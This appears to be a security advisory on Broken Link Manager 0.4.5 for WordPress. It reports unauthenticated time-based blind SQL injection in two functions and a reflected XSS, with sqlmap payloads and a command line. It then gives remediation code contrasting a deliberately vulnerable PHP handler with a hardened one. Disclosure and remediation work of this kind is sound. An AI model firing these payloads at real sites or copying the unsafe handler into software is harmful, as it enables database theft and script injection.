Plugin: Broken Link Manager 0.4.5.
Unauthenticated remote attackers can execute arbitrary SQL commands and inject malicious JavaScript.
1. SQL injection (wpslDelURL() function)
Method: GET
Vulnerable parameter: url [/broken-link-manager/config/functions.php:73]
PHP callstack:
wpslDelURL [/broken-link-manager/config/functions.php:77]
wpdb::query
Sqlmap verification:
...
Parameter: url (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: delURL=1&url=x AND (SELECT * FROM (SELECT(SLEEP(5)))UCNT)
...
2. SQL injection (wpslEditURL() function)
Method: POST
Vulnerable parameter: url [/broken-link-manager/config/functions.php:39]
PHP callstack:
wpslEditURL [/broken-link-manager/config/functions.php:46]
Sqlmap verification:
sqlmap -r wpsl_edit_url_request.txt --dbms mysql -p url
...
Parameter: url (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: type=x&url=1 AND (SELECT * FROM (SELECT(SLEEP(5)))fCpJ)
...
wpsl_edit_url_request.txt file attached
3. Reflected XSS
Method: GET
Vulnerable parameter: page [/broken-link-manager/config/functions.php:74]
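The two defects above (request parameters concatenated into a query passed to wpdb::query, and a request parameter echoed back into HTML) share one remediation pattern in WordPress: bind query values through $wpdb->prepare(), escape output for its HTML context, and gate the handler behind a capability and nonce check so it is no longer reachable by unauthenticated requests. The following is an added illustration written for this advisory, not the plugin's own code; the handler shape, the table name wpsl_broken_links, the nonce action and the capability are assumptions.

```php
<?php
// Added illustration, not code from the Broken Link Manager plugin. It shows a
// hypothetical handler of the same shape as the advisory's url/page handlers,
// first as the unsafe pattern the advisory describes, then hardened.
// Table name, nonce action and capability are assumptions.

// Unsafe pattern: raw request values are interpolated into SQL and reflected
// into the page without encoding. This is the defect class the advisory reports.
function wpsl_del_url_unsafe() {
    global $wpdb;
    $url  = $_GET['url'];   // attacker-controlled
    $page = $_GET['page'];  // attacker-controlled
    // String concatenation: a value like the time-based payloads in the sqlmap
    // output becomes part of the statement instead of data.
    $wpdb->query( "DELETE FROM {$wpdb->prefix}wpsl_broken_links WHERE url = '$url'" );
    // Reflected XSS: value written into an attribute with no escaping.
    echo '<a href="?page=' . $page . '">Back</a>';
}

// Hardened version: authorization, CSRF token, bound query parameter,
// and context-appropriate output escaping.
function wpsl_del_url_safe() {
    global $wpdb;

    // Only privileged users may delete entries (capability is an assumption).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    // Rejects requests that do not carry a valid nonce for this action.
    check_admin_referer( 'wpsl_del_url' );

    // Normalize input before use; wp_unslash() undoes WordPress' magic-quoting.
    $url  = isset( $_GET['url'] )  ? esc_url_raw( wp_unslash( $_GET['url'] ) )  : '';
    $page = isset( $_GET['page'] ) ? sanitize_key( wp_unslash( $_GET['page'] ) ) : '';
    if ( '' === $url ) {
        wp_die( 'Missing url parameter.' );
    }

    // $wpdb->prepare() quotes and escapes the %s placeholder, so any SQL
    // syntax inside $url stays an ordinary string literal.
    $wpdb->query( $wpdb->prepare(
        "DELETE FROM {$wpdb->prefix}wpsl_broken_links WHERE url = %s",
        $url
    ) );

    // Output escaping for the attribute context: sanitize_key() already limits
    // $page to [a-z0-9_-], and esc_url() encodes the assembled link.
    echo '<a href="' . esc_url( admin_url( 'admin.php?page=' . $page ) ) . '">Back</a>';
}
```

The key point for reviewers of similar plugins is the order of defenses: the capability and nonce checks remove the unauthenticated attack surface entirely, while prepare() and the esc_*() family keep the handler safe even when an authorized user sends hostile input. A grep for wpdb->query, wpdb->get_results or wpdb->get_var calls whose argument is a double-quoted string containing a $ variable is a quick way to find candidates for the same fix.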
--
Regards,
Marcin Probola,